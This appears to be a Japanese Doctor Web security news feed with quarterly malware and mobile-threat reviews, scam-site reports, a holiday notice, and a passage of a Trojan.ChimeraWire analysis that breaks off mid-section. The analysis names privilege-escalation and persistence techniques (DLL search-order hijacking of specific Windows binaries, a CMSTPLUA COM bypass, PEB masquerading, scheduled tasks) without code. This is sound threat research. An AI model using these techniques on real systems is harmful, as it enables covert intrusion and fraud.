Dr.Web FixIt! は、Windows OS に対応したワークステーションおよびサーバーを対象に、詳細なセキュリティ解析を行い、検出されたウイルス脅威や潜在的な脆弱性を駆除するためのソリューションです。他のサイバーセキュリティツールでは検出が困難な最新型マルウェアや、標的型攻撃に悪用されるプログラムを検出できる点が、Dr.Web FixIt! の大きな特長です。

本製品は、ITインフラのセキュリティ監視やサイバーインシデント解析を行う専門家の利用を想定して開発されていますが、専任の SOC チームが存在しない環境においても、ワークステーションやサーバー上の脅威を検出し、修復を実行することが可能です。

また、必要に応じて、Dr.Web FixIt! を用いて取得した解析情報について、Doctor Web の専門家による分析支援を依頼することができます。その際は、専門家サポートが提供されるサーティフィケートをご購入いただく必要があります。

Dr.Web FixIt! は、Doctor Web パートナーよりご購入いただけます。

2025年第4四半期のモバイルマルウェアレビュー

Fri, 26 Dec 2025 02:00:00 GMT

2025年12月26日

Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第4四半期に最も多く検出されたAndroid脅威は引き続き、迷惑な広告を表示するトロイの木馬Android.MobiDash および Android.HiddenAdsとなりました。ただし、その活動には低下がみられ、検出数はそれぞれ43.24%と18.06%減少しています。Android.Siggen ファミリーに属するトロイの木馬がその後を追う形となりましたが、その検出数も27.47%減少しています。このトロイの木馬ファミリーにはそれぞれ異なる機能を持つ多様なマルウェアが含まれています。

一方でバンキング型トロイの木馬の活動には顕著な活発化がみられ、その検出数は65.52%増加しています。この増加を牽引しているのがAndroid.Bankerファミリーに属するトロイの木馬です。これらトロイの木馬は銀行取引の確認用ワンタイムコードを含んだSMSを傍受するほか、正規銀行アプリの外観を模倣したり、フィッシング画面を表示したりすることも可能です。

最も多く検出された望ましくないアプリケーションは、クラウドサービスCloudInjectを使用して改造されたAndroidアプリとなりました（Dr.WebアンチウイルスによってProgram.CloudInjectとして検出）。CloudInjectを介した改造ではアプリに危険な権限や難読化されたコードが追加され、そのコードの目的はコントロールすることができません。また、アンチウイルスの動作を模倣して存在しない脅威の検出を通知し、感染から「修復」するために製品の完全版を購入するよう促す偽アンチウイルスProgram.FakeAntiVirus や、さまざまなタスクを完了することでお金を稼ぐことができるとうたうアプリ Program.FakeMoneyも多く検出されています。

最も多く検出されたリスクウェアは、NP Managerユーティリティを使用して改造されたアプリTool.NPModとなりました。このユーティリティはアプリのコードを難読化し、デジタル署名の検証をすり抜けることを可能にする特殊なモジュールを埋め込みます。最も多く検出されたアドウェアの座は依然としてAdware.Adpushファミリーが占めています。これらは開発者によってアプリに組み込まれる特殊なソフトウェアモジュールで、広告を含んだ通知を表示させます。

10月、Doctor WebはメッセンジャーアプリTelegram Xの非公式改変版に潜む危険なバックドアAndroid.Backdoor.Baohuo.1.originを発見しました。このバックドアは悪意のあるWebサイトやサードパーティアプリストアから拡散され、TelegramアカウントのログインIDとパスワードなどといった機密情報を窃取します。また、Android.Backdoor.Baohuo.1.originを使用することで脅威アクターは被害者のアカウントを乗っ取り、メッセンジャー内でユーザーに成り代わってさまざまな操作を密かに実行することが可能です。たとえば、ユーザーをTelegramチャンネルに参加・退出させたり、特定のチャットや新規認証済みデバイスを非表示にしたりすることができます。脅威アクターによるこのバックドアの操作には複数の方法が使用されており、そのうちの1つがRedisデータベースを経由するというものです。これは、Android脅威ではこれまでに例を見ない手法です。合計で約58,000台のデバイスがAndroid.Backdoor.Baohuo.1.originに感染しており、これにはおよそ3千の異なるモデルのスマートフォンやタブレット、TVボックスセット、そしてAndroidベースの車載OSを搭載した自動車が含まれています。

Google Playでは第4四半期を通して新たなマルウェアが発見され、それらの中には被害者を有料サービスに登録するトロイの木馬Android.Jokerや、詐欺スキームに用いられるさまざまな偽アプリAndroid.FakeAppが含まれていました。これらは合計で263,000回以上ダウンロードされています。

2025年第4四半期の主な傾向

広告を表示するトロイの木馬が引き続き最も多く検出されたAndroid脅威となる
バンキング型トロイの木馬による攻撃件数が増加
メッセンジャーTelegram Xの改変版に組み込まれた危険なバックドアAndroid.Backdoor.Baohuo.1.originが拡散される
Google Playに新たな悪意のあるアプリが出現

Dr.Web Security Space for mobile devicesによる統計

Android.MobiDash.7859: 迷惑な広告を表示させるトロイの木馬です。開発者によってアプリケーション内に埋め込まれる特殊なソフトウェアモジュールです。
Android.FakeApp.1600: 設定にハードコードされたWebサイトを開くトロイの木馬アプリです。既知の亜種ではオンラインカジノのサイトが開かれます。
Android.Click.1812: さまざまなWebサイトをバックグラウンドで密かに読み込むことができる、悪意のあるWhatsAppメッセンジャーMod（改造版）の検出名です。
Android.Packed.57.origin: 悪意のあるアプリ（バンキング型トロイの木馬Android.SpyMaxの一部の亜種など）などを保護するために使用される難読化ツールの検出名です。
Android.Triada.5847: Android.Triadaトロイの木馬を検出や解析から保護するよう設計されたパッカーの検出名です。多くの場合、このパッカーはAndroid.Triadaが埋め込まれた悪意のあるTelegramメッセンジャーMod（改造版）と一緒に用いられます。

Program.CloudInject.5
Program.CloudInject.1: クラウドサービスCloudInjectと、同名のAndroidユーティリティ（Tool.CloudInjectとしてDr.Webウイルスデータベースに追加されています）を使用して改造されたAndroidアプリケーションの検出名です。アプリケーションはリモートサーバー上で改造されますが、その際、改造を行うユーザーはアプリに何が追加されるのか具体的な改造内容をコントロールすることができません。また、これらのアプリケーションは危険なシステム権限を複数要求します。改造後、ユーザーはこれらアプリをリモートで管理できるようになります（アプリをブロックする、カスタムダイアログを表示する、他のソフトウェアのインストールや削除を追跡するなど）。
Program.FakeAntiVirus.1: アンチウイルスソフトウェアを模倣するアドウェアアプリケーションの検出名です。これらのアプリは存在しない脅威について偽の通知をすることでユーザーを騙し、ソフトウェアの完全版を購入するよう要求します。
Program.FakeMoney.11: さまざまなタスクを完了することでお金を稼ぐことができるとうたうAndroidアプリケーションの検出名です。このアプリはタスクが完了するたびに報酬が貯まっていくかのように見せかけます。「稼いだ」お金を引き出すために（多くの場合、一般的に広く使用されている支払いシステムや銀行を指定されます）、ユーザーは一定の金額を貯める必要があるとされていますが、たとえその金額が貯まったとしても実際にお金を手にすることはできません。このウイルスレコードは、そのようなアプリのソースコードを基に作成された他の望ましくないソフトウェアの検出にも使用されます。
Program.SnoopPhone.1.origin: Androidユーザーのアクティビティを監視するよう設計されたアプリケーションです。このアプリを使用することで、第三者がSMSを読む、通話に関する情報を収集する、デバイスの位置を追跡する、周囲の音声を録音することが可能になります。

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin: NP Managerユーティリティを使用して改造されたAndroidアプリケーションの検出名です。そのようなアプリには特殊なモジュールが組み込まれており、改造後にデジタル署名の検証をバイパスすることができます。
Tool.LuckyPatcher.2.origin: Androidデバイスにインストールされたアプリを改変できるようにする（パッチを作成する）ツールです。アプリの動作ロジックを変更したり特定の制限を回避したりする目的で使用されます。たとえば、ユーザーはこのツールを使用することで、バンキングアプリのルートアクセス検証を無効にしたり、ゲーム内で無限のリソースを取得したりできます。パッチを追加するために、このユーティリティは特別に作成されたスクリプトをインターネットからダウンロードしますが、このスクリプトは誰でも作成して共通のデータベースに追加することができます。そのようなスクリプトの機能が悪意のあるものである場合もあることから、このツールを使用して作成されたパッチは潜在的な脅威となる可能性があります。
Tool.Androlua.1.origin: スクリプト言語Luaを使用してAndroidアプリを開発するための特別なフレームワークの、潜在的に危険なバージョンの検出名です。Luaベースアプリの主なロジックは、実行時に対応するスクリプトがインタプリタによって暗号化・復号化されるというものです。多くの場合、このフレームワークは動作するためにデフォルトで多数のシステム権限へのアクセスを要求します。その結果、フレームワークが実行するLuaスクリプトによって、取得した権限に応じたさまざまな悪意のある動作が実行される可能性があります。

Adware.AdPush.3.origin
Adware.Adpush.21846: Androidアプリに組み込まれるアドウェアモジュールのファミリーです。ユーザーを騙すような紛らわしい、広告を含んだ通知（オペレーティングシステムからの通知に似せたものなど）を表示させます。また、さまざまな機密情報を収集し、別のアプリをダウンロードしてインストールを開始することができます
Adware.Bastion.1.origin: 「最適化」中に広告を表示させる目的で、ユーザーに誤解させるような虚偽の通知（ストレージ容量不足やシステムエラーに関するものなど）を定期的に出す最適化ツールの検出名です。
Adware.Airpush.7.origin: Androidアプリに組み込まれ、さまざまな広告を表示するアドウェアモジュールのファミリーです。表示されるものはモジュールのバージョンや亜種によって異なり、広告を含む通知やポップアップウィンドウ、バナーなどがあります。多くの場合、攻撃者はユーザーにさまざまなソフトウェアをインストールするよう促してマルウェアを拡散させる目的で、これらのモジュールを使用しています。さらに、これらモジュールは個人情報を収集してリモートサーバーに送信します。
Adware.ModAd.1: その機能に特定のコードが挿入されている、WhatsAppメッセンジャーのMod（改造版）です。このコードはメッセンジャーの動作中にWebコンテンツを表示（Android WebViewコンポーネントを使用して）させることで目的のURLをロードします。これらのURLから、オンラインカジノやブックメーカー、アダルトサイトなどの広告サイトへのリダイレクトが実行されます。

Google Play上の脅威

2025年第4四半期には、Doctor Webのウイルスアナリストによって20を超える悪意のあるAndroid.JokerアプリがGoogle Play上で発見されました。Android.Jokerはユーザーを有料サービスに登録するよう設計されており、メッセンジャーやシステム最適化ツール、画像編集アプリ、動画再生アプリなどさまざまなアプリに偽装していました。

発見された悪意のあるAndroid.Jokerアプリの例：Android.Joker.2496はスマホ内のジャンクを削除するツール「Useful Cleaner」に偽装し、Android.Joker.2495の亜種の1つは動画再生アプリ「Reel Drama」を装って拡散されていた

Android.FakeAppファミリーに属する偽アプリも新たなものがいくつか発見されています。これまで同様、その一部は金融関連アプリとして拡散され、詐欺サイトを開くよう設計されていました。また別の一部はゲームを装って拡散されています。このタイプのAndroid.FakeAppは特定の条件下（ユーザーのIPアドレスが攻撃者の指定した条件に一致する場合など）でオンラインカジノやブックメーカーのサイトを開く場合があります。

ゲーム「Chicken Road Fun」に偽装したAndroid.FakeApp.1910：この偽アプリはゲームとして機能する代わりにオンラインカジノのサイトを開く場合がある

お使いのAndroidデバイスをマルウェアや望ましくないプログラムから保護するために、Android向け Dr.Webアンチウイルス製品をインストールすることをお勧めします。

Indicators of compromise（セキュリティ侵害インジケーター）

2025年第4四半期のウイルスレビュー

Fri, 26 Dec 2025 00:00:00 GMT

2025年12月26日

Dr.Webアンチウイルスの検出統計によると、2025年第4四半期に検出された脅威の合計数は2025年第3四半期と比較して16.05%増加し、一方でユニークな脅威の数は1.13%減少しました。最も多く検出された脅威は、望ましくないアドウェアアプリ、悪意のあるスクリプト、そしてダウンローダやアドウェア型トロイの木馬を含むさまざまなマルウェアとなっています。

メールトラフィック内では、ダウンローダやパスワードスティーラー、ドロッパーなどのトロイの木馬アプリが最も多く検出されました。そのほか、エクスプロイト、バックドア、そしてさまざまな悪意のあるスクリプトも多く拡散されています。

最も多く検出された暗号化ランサムウェアは Trojan.Encoder.35534、Trojan.Encoder.41868、Trojan.Encoder.29750 となっています。

2025年10月、Doctor WebはメッセンジャーアプリTelegram Xの改変版に潜んで拡散されていた危険なバックドア Android.Backdoor.Baohuo.1.origin を発見しました。このバックドアはTelegramアカウントのログインIDとパスワードなどといった機密情報を窃取します。Android.Backdoor.Baohuo.1.origin を使用することで、脅威アクターはハッキングしたアカウントだけでなくメッセンジャーそのものを完全にコントロールすることができ、ユーザーに成り代わってさまざまな操作を実行することが可能です。

11月、Doctor Webのアンチウイルスラボはハッカー集団「Cavalry Werewolf」によるロシア政府機関を狙った標的型攻撃に関する調査レポートを公開しました。この調査において、Doctor WebのエキスパートはCavalry Werewolfが攻撃キャンペーンで使用していた多数の悪意のあるツールを特定することに成功しています。それらのツールにはオープンソースツールも含まれていました。また同調査レポートでは、ハッカー集団Cavalry Werewolfの特徴やこれらのサイバー犯罪者たちが侵害されたネットワーク内で実行する典型的なアクションについても解説しています。

12月には、Trojan.ChimeraWire と名づけられたユニークなマルウェアについて記事を公開しました。このマルウェアはWebサイトのボット対策機能にブロックされないよう人間になりすましてサイトの人気度を人為的に高めます。そのために、まず検索エンジン内で目的のサイトを自動的に検索して開き、次に悪意のあるアクターから受け取ったパラメータに従ってそのWebページ上でユーザーの操作を模倣してリンクをクリックします。Trojan.ChimeraWire はDLL検索順序ハイジャッキング脆弱性を悪用する悪意のあるプログラムを複数使用することでコンピューターを感染させ、検出を回避するためにアンチデバッグ手法も用います。

第4四半期を通して、素早く簡単に稼ぐことができると約束する新たな詐欺サイトがDoctor Webのインターネットアナリストによって特定されています。フィッシングサイトや偽のマーケットプレイスサイトも新たなものが確認されました。

Google Playでは引き続き新たな悪意のあるアプリが発見されています。それらの中にはAndroidユーザーを有料サービスに登録するトロイの木馬 Android.Joker や、さまざまな詐欺スキームに用いられる悪意のあるアプリ Android.FakeApp が含まれていました。また、Dr.Web Security Space for mobile devicesによって収集された検出統計から、Android向けバンキング型トロイの木馬の活動が活発化していることが明らかになりました。

2025年第4四半期の主な傾向

検出された脅威の合計数が増加
攻撃に使用されるユニークな脅威の数が減少
ランサムウェアに暗号化されたファイルの復号化リクエスト数が増加
Androidユーザーを標的としたバンキング型トロイの木馬の活動が活発化
AndroidユーザーのTelegramアカウントをハッキングするバックドア Android.Backdoor.Baohuo.1.origin が拡散される
Google Playに新たな悪意のあるアプリが出現

Doctor Webサーバーによる統計

2025年第4四半期に最も多く検出された脅威：

Trojan.Siggen31.34463: 感染したシステムにさまざまなマイニング型トロイの木馬やアドウェアをダウンロードするよう設計された、Go言語で記述されたトロイの木馬です。このマルウェアは %appdata%\utorrent\lib.dll に置かれるDLLファイルで、Torrentクライアント「uTorrent」のDLL検索順序ハイジャッキング脆弱性を悪用することで起動します。
Adware.Downware.20091: 海賊版ソフトウェアのインストーラとして拡散されていることの多いアドウェアです。
VBS.KeySender.7: mode extensions、разработчика、розробника というテキストを含むウィンドウを無限ループで検索し、Escapeキー押下イベントを送信してそれらを強制的に閉じる悪意のあるスクリプトです。
Trojan.BPlug.4268: WinSafeブラウザ拡張機能の悪意のあるコンポーネントの検出名です。このコンポーネントはブラウザに迷惑な広告を表示させるJavaScriptファイルです。
Adware.Siggen.33379: 広告を表示させるために別のマルウェアによってシステムにインストールされる偽の「Adblok Plus」（ブラウザ用広告ブロッカー）です。

メールトラフィック内で検出された脅威の統計

W97M.DownLoader.2938: Microsoft Officeドキュメントの脆弱性を悪用するダウンローダ型トロイの木馬のファミリーです。感染させたコンピューターに別の悪意のあるプログラムをダウンロードすることもできます。
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Microsoft Officeソフトウェアの脆弱性を悪用し、攻撃者が任意のコードを実行できるようにするエクスプロイトです。
Trojan.AutoIt.1413: AutoItスクリプト言語で記述された悪意のあるアプリ Trojan.AutoIt.289 の、パックされたバージョンの検出名です。マイニング型トロイの木馬やバックドア、自己増殖型モジュールなど複数の悪意のあるアプリグループの一部として拡散されます。Trojan.AutoIt.289 はメインのペイロードの検出を困難にする、さまざまな悪意のある動作を実行します。
JS.Phishing.791: フィッシングページを生成する悪意のあるJavaScriptスクリプトです。

暗号化ランサムウェア

2025年第4四半期にDoctor Webテクニカルサポートサービスに寄せられた、ランサムウェアによって暗号化されたファイルの復号化リクエスト数は、2025年第3四半期と比較して1.15%増加しました。

Doctor Webのテクニカルサポートサービスに寄せられた復号化リクエスト数の推移：

2025年第4四半期に最も多く確認された暗号化ランサムウェア（ユーザーからのリクエスト全体に占める割合）：

Trojan.Encoder.35534 — 24.90%
Trojan.Encoder.41868 — 4.21%
Trojan.Encoder.29750 — 3.42%
Trojan.Encoder.26996 — 2.68%
Trojan.Encoder.30356 — 0.38%

インターネット詐欺

2025年第4四半期、Doctor Webのインターネットアナリストは新たな偽のマーケットプレイスサイトが出現していることを確認しました。詐欺師はマーケットプレイスを装ったサイトで、ルーレットに似た回転式のゲームに参加して賞品を獲得するようユーザーを誘っています。ユーザーは何度か挑戦した後「ツキが回って」きますが、賞品を受け取るためにまず送料を、そして次は保険料、その次は税金、などといった具合に次から次へと支払いを求められます。中には、賞品の在庫がないため代わりに現金で受け取ることができると告げられるケースも確認されています。ユーザーが同意すると、この場合も保険料やアカウント有効化のためなどと称して支払いを要求されます。

「賞品の抽選」を提供する偽のマーケットプレイスサイトの例

第4四半期には、架空の劇場チケットを販売するサイトもDoctor Webの望ましくないサイトや悪意のあるサイトのデータベースに追加されました。こうしたサイトでは人気の舞台公演チケットを、多くの場合魅力的な価格で提供しています。しかしながら、購入代金を支払ったユーザーがチケットを受け取ることはなく、詐欺師にお金をあげてしまうも同然の結果に終わります。

存在しない劇場チケットを販売する詐欺サイトの1つ

他にも、プライベートシアターのサイトを装って映画チケットを販売するサイトが発見されています。これらのサイトでも、購入代金を支払った被害者がチケットを受け取ることはありません。

プライベートシアターの偽サイト

フィッシングサイトも複数発見され、そのうちのいくつかはPCゲームプラットフォーム「Steam」の偽サイトでした。悪意のあるアクターは、偽の認証画面でアカウント名とパスワードを入力するよう求めることでユーザーのアカウントデータを窃取しようとしていました。

本物の「Steam」サイトを模倣し、アカウントにログインするよう求めるフィッシングサイト

存在しない投資プラットフォームにユーザーを誘い込む手法も引き続き横行しています。発見されたサイトの1つは米国在住のロシア語話者を標的とし、「Federal Invest」と呼ばれるプロジェクトに250ドル投資すれば「3か月で最大90,000ドル得ることができる」と持ちかけています。さらに、このプロジェクトの発足にはドナルド・トランプ氏が関わっていると主張しています。

「儲かる投資プロジェクト」に参加できると持ちかける詐欺サイト

また別の詐欺サイトはウズベキスタンのユーザーを標的に大手持株会社と関連があるとするプロジェクトを宣伝し、このプロジェクトに参加すれば最初の1か月だけで1500万スム以上の収入を得ることができるとうたっています。

「投資プロジェクト」に参加することで多額の利益を得ることができるとウズベキスタンの住民に約束する詐欺サイト

Find out more about Dr.Web non-recommended sites

モバイルデバイスを脅かす悪意のあるプログラムや望ましくないプログラム

Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第4四半期には広告を表示させるトロイの木馬 Android.MobiDash と Android.HiddenAds が、活動には減少がみられたものの、引き続き最も多く検出された脅威となりました。Android.Siggen ファミリーに属する多様な機能を持つマルウェアが3位に上昇しています。バンキング型トロイの木馬の活動は第4四半期を通して活発化し、なかでも最も大きな増加をみせたのは Android.Banker ファミリーでした。

最も多く検出された望ましくないアプリケーションは、クラウドサービスCloudInjectを使用して改造されたアプリ Program.CloudInject となりました。最も多く検出されたリスクウェアはNP Managerユーティリティを使用して改造されたアプリ Tool.NPMod となり、最も多く検出されたアドウェアは開発者によってAndroidアプリに組み込まれるモジュール Adware.Adpush でした。

10月、Doctor WebはメッセンジャーアプリTelegram Xの改変版に埋め込まれた危険なバックドア Android.Backdoor.Baohuo.1.origin を発見しました。このマルウェアは機密情報を窃取し、動作ロジックを変更することで攻撃者が被害者のアカウントとメッセンジャー自体の両方を操作できるようにします。

Google Playでは第4四半期を通して新たな脅威が発見され、それらの中にはユーザーを有料サービスに登録するトロイの木馬 Android.Joker や、詐欺スキームに用いられる悪意のあるアプリ Android.FakeApp が含まれていました。

2025年第4四半期のモバイルマルウェアに関連した注目すべきイベント：

アドウェア型トロイの木馬が引き続き最も多く検出されたAndroid脅威となる
バンキング型トロイの木馬 Android.Banker の活動が増加
メッセンジャーアプリTelegram Xの改変版に潜む危険なバックドア Android.Backdoor.Baohuo.1.origin が発見される
Google Playに新たな悪意のあるアプリが出現

2025 年第4四半期のモバイルデバイスを取り巻くセキュリティ脅威の状況についての詳細はこちらのレビューをご覧ください。

年末年始休業のお知らせ

Fri, 12 Dec 2025 00:00:00 GMT

2025年12月12日

株式会社Doctor Web Pacific

年末・年始は下記の期間休業させていただきます。

2025年12月29日（月）～2026年1月4日（日）

年明けは、2026年1月5日（月）9:30より通常通り営業いたします。

キメラ退治の英雄ベレロフォンも驚愕：巧みに人間になりすましサイトの人気度を高めるトロイの木馬ChimeraWire

Wed, 10 Dec 2025 01:00:00 GMT

2025年12月10日

序論

Doctor Webのエキスパートは、アフィリエイトプログラムの1つを解析中にクリッカー機能を備えたユニークなマルウェアを発見しました。Trojan.ChimeraWireと名づけられたこのマルウェアはWebサイトやWebアプリケーションの管理を自動化するオープンソースプロジェクトzlsgoとRodをベースにしたもので、Microsoft Windows搭載コンピューターを標的としています。

このTrojan.ChimeraWireを使用することで、サイバー犯罪者はユーザーによる操作を装ってWebサイト内のユーザー行動を向上させ、そのサイトが検索エンジンでの検索結果に表示される順位を人為的に引き上げることができます。そのために、このマルウェアは検索エンジンGoogleとBing内で目的のサイトを探してそれらを開き、そのサイト上でユーザーの操作を模倣してリンクをクリックします。Trojan.ChimeraWireはすべての悪意のある動作を、特定のドメインからダウンロードしてWebSocketプロトコル経由のデバッグモードで起動させたGoogle Chromeブラウザ内にて実行します。

Trojan.ChimeraWireは複数の悪意のあるダウンローダを通じてコンピューターに侵入します。これらのダウンローダはDLL検索順序ハイジャッキング脆弱性の悪用をベースとするさまざまな権限昇格手法や、検出を回避するためのアンチデバッグ手法を用います。Doctor Webのアンチウイルスラボでは、これらのマルウェアが関与する感染チェーンを少なくとも2つ追跡しています。そのうちの1つでは悪意のあるスクリプトPython.Downloader.208が中心的役割を担い、もう1つのチェーンではTrojan.DownLoader48.61444が中心となっています。このTrojan.DownLoader48.61444の動作原理は悪意のあるスクリプトPython.Downloader.208のものとほぼ同じであり、実質的にその代替として使用されています。

本稿では、Trojan.ChimeraWireの特徴と、このトロイの木馬をユーザーのデバイス上に送り込むために用いられる悪意のあるアプリについて解説します。

1つ目の感染チェーン

１つ目の感染チェーンを示す図

１つ目の感染チェーンはTrojan.DownLoader48.54600から始まります。このマルウェアはそれが人工的な環境で動作しているかどうかを検証し、仮想マシンやデバッグモードの徴候を検知すると動作を終了します。そのような徴候がない場合はC2サーバーからZIPアーカイブpython3.zipをダウンロードします。これには悪意のあるスクリプトPython.Downloader.208と、その動作に必要な追加のファイル（Trojan.Starter.8377である悪意のあるライブラリISCSIEXE.dllなど）がいくつか含まれており、Trojan.DownLoader48.54600はこのアーカイブを解凍してスクリプトを実行します。このスクリプトPython.Downloader.208はC2サーバーから次の段階を受信するダウンローダで、感染の第2段階を担います。

Python.Downloader.208の動作は実行時の権限によって異なります。管理者権限なしで実行された場合はその権限を取得しようと試みます。そのために、Python.Downloader.208と一緒に抽出されたTrojan.Starter.8377がディレクトリ%LOCALAPPDATA%\Microsoft\WindowsAppsにコピーされ、さらにスクリプトruns.vbsが作成されます。このスクリプトは後にPython.Downloader.208を再度実行するために使用されます。

次に、Python.Downloader.208はシステムアプリ%SystemRoot%\SysWOW64\iscsicpl.exeを起動させます。このアプリにはDLL検索順序ハイジャッキング脆弱性が存在するため、正規のWindowsコンポーネントと同じ名前を持つトロイの木馬ライブラリISCSIEXE.dllが自動的に読み込まれます。

続けて、Trojan.Starter.8377がVBSスクリプトruns.vbsを実行し、このスクリプトがPython.Downloader.208を今度は管理者権限で実行します。

必要な権限で実行されると、Python.Downloader.208はパスワード保護されたアーカイブonedrive.zipをC2サーバーからダウンロードします。このアーカイブには次の感染段階であるTrojan.DownLoader48.54318がライブラリUpdateRingSettings.dllとして含まれているほか、その動作に必要な追加のファイル（Windowsに組み込まれたOneDriveの一部であり有効なデジタル署名を持った正規アプリOneDrivePatcher.exeなど）も格納されています。

Python.Downloader.208はアーカイブを解凍すると、アプリOneDrivePatcher.exeがシステム起動時に実行されるようにするタスクをシステムスケジューラに作成します。次にPython.Downloader.208はこのアプリを起動しますが、このアプリもDLL検索順序ハイジャッキング脆弱性を持つため、OneDriveのコンポーネントと同じ名前が付いた悪意のあるライブラリUpdateRingSettings.dll（Trojan.DownLoader48.54318）が自動的に読み込まれます。

Trojan.DownLoader48.54318はコントロールを掌握すると自身が人工的な環境で実行されているかどうかをチェックし、仮想マシンやデバッグモードで動作している徴候を検知すると動作を終了します。

そのような徴候が検知されなかった場合、Trojan.DownLoader48.54318はC2サーバーからペイロードとその復号化に使用するキーをダウンロードします。

復号化されたペイロードはシェルコードと実行ファイルを含んだZLIBコンテナで、Trojan.DownLoader48.54318は復号化の後このコンテナを解凍しようとします。解凍に失敗した場合、トロイの木馬は自身を削除し、アクティブなプロセスを終了します。解凍に成功した場合はコントロールがシェルコードに受け渡され、このシェルコードが一緒に含まれている実行ファイルを解凍します。このファイルが感染の最終段階、すなわち最終的な目的であるトロイの木馬Trojan.ChimeraWireです。

2つ目の感染チェーン

2つ目の感染チェーンはマルウェアTrojan.DownLoader48.61444から始まります。このマルウェアは起動されると管理者権限を持っているかどうかをチェックし、持っていない場合は取得しようとします。Trojan.DownLoader48.61444はセキュリティシステムをすり抜けるためにMasquerade PEB手法を使用しており、正規のプロセスexplorer.exeに偽装しています。

次に、システムライブラリ%SystemRoot%\System32\ATL.dllのコピーにパッチを適用します。そのために、Trojan.DownLoader48.61444はそのコンテンツを読み取り、復号化されたバイトコードとトロイの木馬ファイルへのパスをそこに追加します。そうして改変したコピーをファイルdropperとして、元々置かれていた同じディレクトリに保存します。その後、サービス%SystemRoot%\System32\wbemと改変したライブラリのWindowsシェルCOMオブジェクトを初期化します。初期化に成功すると、Trojan.DownLoader48.61444はCMSTPLUA COMインターフェースを使用して、一部の古いCOMインターフェースによくある脆弱性を悪用することで管理者権限を取得しようと試みます。

成功すると、改変されたライブラリdropperがATL.dllファイルとしてディレクトリ%SystemRoot%\System32\wbemにコピーされます。その後、Trojan.DownLoader48.61444はWindows Management InstrumentationWmiMgmt.mscを起動します。その結果、システムアプリmmc.exeに存在するDLL検索順序ハイジャッキング脆弱性が悪用され、パッチの適用されたライブラリ%SystemRoot%\System32\wbem\ATL.dllが自動的に読み込まれます。そしてこのライブラリがTrojan.DownLoader48.61444を再度、今度は管理者権限で実行します。

管理者権限がない場合のTrojan.DownLoader48.61444の動作を示す図

管理者権限で実行されると、Trojan.DownLoader48.61444はC2サーバーからペイロードをダウンロードするための複数のPowerShellスクリプトを実行します。ダウンロードされるオブジェクトの 1 つが ZIP アーカイブone.zipで、これには1つ目の感染チェーンでダウンロードされるアーカイブonedrive.zipと同じファイル（正規アプリOneDrivePatcher.exeと、Trojan.DownLoader48.54318である悪意のあるライブラリUpdateRingSettings.dll）が含まれています。

Trojan.DownLoader48.61444はアーカイブを解凍し、 OneDrivePatcher.exeがシステム起動時に実行されるようにするタスクをシステムスケジューラに作成した後、このアプリを起動します。1つ目の感染チェーン同様、OneDrivePatcher.exeに存在するDLL検索順序ハイジャッキング脆弱性が悪用され、トロイの木馬ライブラリUpdateRingSettings.dllが自動的に読み込まれます。その後のシナリオは1つ目の感染チェーンと同じです。

同時に、Trojan.DownLoader48.61444は2つ目のZIPアーカイブtwo.zipもダウンロードします。これには悪意のあるスクリプトPython.Downloader.208（update.py）と、その実行に必要なファイルが含まれています。そのうちの1つがGuardian.exeで、これは名前を変更されたPythonコンソールインタープリタpythonw.exeです。

アーカイブを解凍すると、Trojan.DownLoader48.61444はGuardian.exeがシステム起動時に実行されるようにするタスクをシステムスケジューラに作成します。さらに、このアプリを介して悪意のあるスクリプトPython.Downloader.208を直接実行します。

1つ目の感染チェーンと同じプロセスを部分的に採用することで、脅威アクターは標的システムにTrojan.ChimeraWireがダウンロードされる確率を高めようと目論んだものとみられます。

管理者権限を取得したTrojan.DownLoader48.61444の動作を示す図

Trojan.ChimeraWire

Trojan.ChimeraWireという名前は、異なる動物の身体的特徴をあわせ持つ神話上の怪物「chimera（キメラ）」と「wire（ワイヤー）」を組み合わせたものです。「chimera」は攻撃者が複数の手法（異なるプログラミング言語で書かれたダウンローダ型トロイの木馬の使用、アンチデバッグ技術の使用、感染プロセスにおける権限昇格）を用いるというそのハイブリッドな特徴を表しています。さらに、このトロイの木馬がさまざまなフレームワーク、プラグイン、そして密かにトラフィックをコントロールするための正規ソフトウェアを組み合わせたものであるという事実も反映しています。2つ目の単語「wire」はここに関わってきます。これはトロイの木馬が目に見えないところで悪意のあるネットワーク操作を実行するということを示しています。

Trojan.ChimeraWireは標的のコンピューターに侵入するとサードパーティサイトからアーカイブchrome-win.zipをダウンロードします。このアーカイブにはWindows用のGoogle Chromeブラウザが含まれています。ここで注意したいのは、このサイトにはLinuxやmacOSなどの他のOS向けGoogle Chromeビルド（さまざまなハードウェアプラットフォーム用のものを含む）を含んだアーカイブも置かれているという点です。

トロイの木馬が必要なアーカイブをダウンロードする、さまざまなGoogle Chromeビルドを提供するサイト

ブラウザがダウンロードされると、Trojan.ChimeraWireはそこにCAPTCHAを自動で解決するよう設計されたアドオンNopeCHAとBusterを密かにインストールします。これらのアドオンはトロイの木馬が動作中に使用します。

次に、ブラウザをデバッグモードでウィンドウを表示せずに起動します。これにより、ユーザーに気づかれることなく悪意のある動作を実行することが可能になります。その後、自動的に選択されたデバッグポートとの接続がWebSocketプロトコル経由で確立されます。

続けて、トロイの木馬はタスクの受信へと進みます。C2サーバーにリクエストを送信し、応答としてBase64文字列を受け取ります。この文字列にはAES-GCMアルゴリズムで暗号化されたJSON形式での設定が含まれています。

トロイの木馬がC2サーバーから受信する設定の例

この設定には、以下のタスクとそれに関連するパラメータが含まれています。

対象とする検索エンジン（GoogleとBingに対応）
対象の検索エンジン内でサイトを検索し、それらを開くためのキーフレーズ
Webページ連続遷移の最大回数
Webページ上で自動クリックを実行するためのランダム分布
ページの読み込み待機時間
対象ドメイン

実際のユーザー操作をより高度に模倣し、途切れのないアクティビティを監視するシステムをすり抜けるために、この設定には作業セッションと作業セッションの間で一時停止するためのパラメータも含まれています。

ユーザーのマウスクリックを模倣

Trojan.ChimeraWireは次のタイプのクリックを実行することができます。

検索結果をナビゲートするためのクリック
見つかった目的のリンクを新しいバックグラウンドタブで開くためのクリック

